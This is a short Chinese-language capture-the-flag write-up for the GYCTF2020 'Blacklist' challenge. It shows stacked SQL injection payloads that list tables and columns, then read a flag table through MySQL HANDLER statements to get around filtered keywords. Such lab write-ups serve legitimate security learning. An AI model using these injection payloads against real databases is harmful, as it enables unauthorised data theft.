[GYCTF2020]Blacklist
前言
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
参考了高诺琪师傅的文章:https://www.cnblogs.com/gaonuoqi/p/12398554.html
一、收集信息
过滤了很多东西,过滤了prepare预编译用不了,过滤了alter也是用不了改表、列名。
但可以查看一下表名
1';show tables;#
有两个表,查看一下FlagHere
1';show columns from FlagHere;#
看到有flag字段,应该就是这个了!
这次就用handler函数进行堆注入!
用法:
HANDLER table_name OPEN语句打开一个表,实际这里声明了一个表的句柄
HANDLER table_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果
HANDLER table_name CLOSE来关闭打开的句柄
二、payload
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
总结
感谢BUUCTF提供的平台练习!